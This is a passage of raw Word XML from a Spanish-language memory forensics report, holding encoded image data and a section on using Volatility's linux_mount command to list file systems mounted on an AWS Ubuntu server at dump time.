Dr3RgZbzg+22lQ&#10;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5PRu/AAwAAZQgAAA4AAAAAAAAAAAAAAAAAOgIAAGRycy9l&#10;Mm9Eb2MueG1sUEsBAi0ACgAAAAAAAAAhAGaPm304HwMAOB8DABQAAAAAAAAAAAAAAAAAJgYAAGRy&#10;cy9tZWRpYS9pbWFnZTEucG5nUEsBAi0AFAAGAAgAAAAhAJSSherhAAAACgEAAA8AAAAAAAAAAAAA&#10;AAAAkCUDAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQCqJg6+vAAAACEBAAAZAAAAAAAA&#10;AAAAAAAAAJ4mAwBkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAAJEnAwAA&#10;AA==&#10;">
                <v:shape id="Imagen 31" o:spid="_x0000_s1103" type="#_x0000_t75" alt="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente con confianza media" style="position:absolute;width:38239;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cLRyAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RasJA&#10;FETfC/2H5Qq+1Y1VE01dRQTBNzH1A26zt0kwezfNbnX9e1cQfBxm5gyzXAfTigv1rrGsYDxKQBCX&#10;VjdcKTh97z7mIJxH1thaJgU3crBevb8tMdf2yke6FL4SEcIuRwW1910upStrMuhGtiOO3q/tDfoo&#10;+0rqHq8Rblr5mSSpNNhwXKixo21N5bn4Nwps2LRH+ecP4fzTFLu9nt5OZqrUcBA2XyA8Bf8KP9t7&#10;rSBLJ7M0m2ULeFyKd0Cu7gAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCRycLRyAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId152" o:title="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente con confianza media"/>
                </v:shape>
                <v:shape id="_x0000_s1104" type="#_x0000_t202" style="position:absolute;left:39852;top:9747;width:1417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pftyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC+yJZ2lm3XZGENBvYx1u3gLzVtT17yUJN3qtzeC4PH9/r/lerQdu6APrSMJ2VQAQ6qd&#10;bqmRcDy8ThbAQlSkVecIJXxjgPXq9mapSu2utMdLFRuWQiiUSoKJsS85D7VBq8LU9UiJOzlvVUyn&#10;b7j26prCbcdnQhTcqpZSg1E9bg3W52qwEnb55848DKeXj03+6N+Pw7b4aiop7+/GzTOwiGP8F/+5&#10;33SaPxfzpywvRAa/PyUA+OoHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAUIqX7ckAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="34FA7F11" w14:textId="27AADB64" w:rsidR="00980ABC" w:rsidRPr="007D54C2" w:rsidRDefault="00980ABC" w:rsidP="00980ABC">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>26</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="72" w:name="_Toc155782593"/>
                        <w:r w:rsidR="006416DF">
                          <w:t xml:space="preserve">Comando </w:t>
                        </w:r>
                        <w:r w:rsidRPr="008E6356">
                          <w:t>linux_mount.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="72"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D35DDC" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación, se va a </w:t>
      </w:r>
      <w:r w:rsidR="009E264A" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enumerar</w:t>
      </w:r>
      <w:r w:rsidR="00D35DDC" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> los sistemas de archivos montados en el momento del volcado de memoria. Esto puede proporcionar información sobre las particiones y los sistemas de archivos utilizados. Para ello, ejecutaremos el comando </w:t>
      </w:r>
      <w:r w:rsidR="00D35DDC" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D35DDC" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_mount</w:t>
      </w:r>
      <w:r w:rsidR="00D35DDC" w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Se procede a adjuntar una captura de pantalla del comando y del comando utilizado en este caso. Además, se ha elaborado una tabla detallada en el comando para su comprensión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A7E85E" w14:textId="02C9E913" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="008235EF" w:rsidP="00D35DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155654101 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>IX. Comando linux_mount</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230A3F6" w14:textId="49A8247F" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="00D35DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Teniendo en cuenta que es un servidor con un kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</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D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Se puede realizar el siguiente análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4817D87B" w14:textId="08CB2486" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cgroup (</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/sys/fs/cgroup/rdma</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D8C82A" w14:textId="155B7B87" w:rsidR="00D35DDC" w:rsidRPr="00D35DDC" w:rsidRDefault="00D35DDC" w:rsidP="00D35DDC">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D35DDC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
